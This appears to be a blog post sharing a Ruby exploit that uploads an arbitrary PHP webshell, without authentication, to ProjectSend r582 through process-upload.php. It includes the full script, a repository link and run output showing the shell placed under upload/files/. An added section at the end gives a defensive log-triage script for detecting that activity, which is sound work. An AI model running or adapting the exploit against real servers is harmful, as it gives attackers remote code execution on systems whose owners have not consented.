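[WEB HACKING] ProjectSend R582 WebShell Vulnerability (Exploit) [ZERODAY?]
While recently analyzing a framework called ProjectSend, I found a vulnerability that allows a webshell to be uploaded and submitted it to Exploit-DB, but..
It turned out to be a vulnerability that had already been published =_= .. I was so pleased that I wrote the script and sent it off right away, without thinking to search for it first..
Still, it is written simply in Ruby and is usable, so I am sharing it through the blog.
It is a zero-day that still works on r582, the current latest version.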
GIT Repo
https://github.com/hahwul/ProjectSend_r582_webshell.git
+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/ProjectSend_r582_webshell.rb
+ https://github.com/hahwul/ProjectSend_r582_webshell/blob/master/README.md
# git clone https://github.com/hahwul/ProjectSend_r582_webshell.git
Source Code
ProjectSend_r582_webshell.rb
# --------------------------------------------------------------------
# Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)
# Date: 2015-07-01
# Exploit Author: hahwul
# Blog: http://www.codeblack.net
# Vendor Homepage: http://www.projectsend.org
# Software Link: http://www.projectsend.org/download/108/
# Version: ProjectSend-r582
# Tested on: debian [wheezy]
# CVE : none
# --------------------------------------------------------------------
require "net/http"
require "uri"
require "net/http/post/multipart"
if ARGV.length != 2
  puts "ProjectSend r582ver Webshell Upload"
  puts "Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]"
  puts " targetURL(ex): http://127.0.0.1/vul_test/ps"
  puts " ShellFile(ex): MyShell.php"
  puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php"
  puts " Include Gem : gem install multipart-post"
  puts " exploit & code by hahwul[www.codeblack.net]"
else
  target_url = ARGV[0] # http://127.0.0.1/ps/
  shell_name = ARGV[1] # myshell.php
  exp_url = target_url + "/process-upload.php"
  uri = URI.parse(exp_url)
  http = Net::HTTP.new(uri.host, uri.port)
  multipartParams = {"file" => UploadIO.new(File.new(shell_name), "application/octet-stream", "shell.php")}
  multipartParams = multipartParams.merge({"name"=>"shell.php"})
  request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams)
  request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
  request["Cache-Control"] = "no-cache"
  request["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0"
  request["Connection"] = "keep-alive"
  request["Accept-Language"] = "ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3"
  request["Accept-Encoding"] = "gzip, deflate"
  request["Pragma"] = "no-cache"
  response = http.request(request)
  puts "Target: "+uri.host+uri.path
  puts "Exploit..."
  puts "Status code: "+response.code
  puts "Open WebShell Page :: "+target_url+"/upload/files/"+shell_name
end
Execute & Result
# ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php
Target: 127.0.0.1/vul_test/ps/process-upload.php
Exploit...
Status code: 302
Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php
Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php
WEBSHELL UPLOAD
total 12
drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 .
drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 ..
-rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php
-rw-r--r-- 1 www-data www-data 66 Jul 1 01:21 shell.php
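For anyone running ProjectSend who wants to check whether this upload path has been used against their server, the following is an added example (not part of the original post or of ProjectSend) that triages a web access log. It flags requests for server-side scripts under upload/files/ and raises the severity when the same client had earlier posted to process-upload.php. The Apache combined log format, the extension list, the severity labels and the sample lines (documentation-range IPs) are assumptions made for the example.

```ruby
# Added example (not from the original post): defender-side access-log triage.
# Endpoint and directory names come from the post; the log lines are constructed.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [01/Jul/2015:01:21:03 +0900] "POST /vul_test/ps/process-upload.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
  198.51.100.7 - - [01/Jul/2015:01:21:40 +0900] "GET /vul_test/ps/upload/files/shell.php HTTP/1.1" 200 66 "-" "Mozilla/5.0"
  203.0.113.9 - - [01/Jul/2015:02:00:00 +0900] "POST /vul_test/ps/process-upload.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
  203.0.113.9 - - [01/Jul/2015:02:00:05 +0900] "GET /vul_test/ps/upload/files/report.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
  192.0.2.44 - - [01/Jul/2015:03:10:00 +0900] "GET /vul_test/ps/upload/files/old.PHP?x=1 HTTP/1.1" 404 210 "-" "curl/7.38"
LOG

LINE_RE   = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /
UPLOAD_RE = %r{/process-upload\.php\z}
# Script extensions that should never be served from the upload directory.
SCRIPT_RE = %r{/upload/files/[^/]+\.(?:php\d?|phtml|phar)\z}i

# Parse one access-log line; returns nil for lines that do not match.
def parse(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[1], time: m[2], method: m[3],
    path: m[4].split("?", 2).first, status: m[5].to_i }
end

# :high   = the same client posted to the upload endpoint earlier and the script was served
# :medium = script served (200) to a client with no logged upload
# :low    = script requested but not served
def severity_for(entry, uploaded)
  return :low unless entry[:status] == 200
  uploaded ? :high : :medium
end

def find_webshell_activity(log_text)
  uploads = {}   # client IP => time of its last POST to the upload endpoint
  findings = []
  log_text.each_line do |line|
    e = parse(line.strip)
    next unless e
    if e[:method] == "POST" && e[:path].match?(UPLOAD_RE)
      uploads[e[:ip]] = e[:time]
    elsif e[:path].match?(SCRIPT_RE)
      findings << { ip: e[:ip], path: e[:path], status: e[:status],
                    uploaded_at: uploads[e[:ip]],
                    severity: severity_for(e, uploads.key?(e[:ip])) }
    end
  end
  findings
end

find_webshell_activity(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

Any :high or :medium finding means a script under upload/files/ was actually served, so the file on disk should be inspected as well as the log.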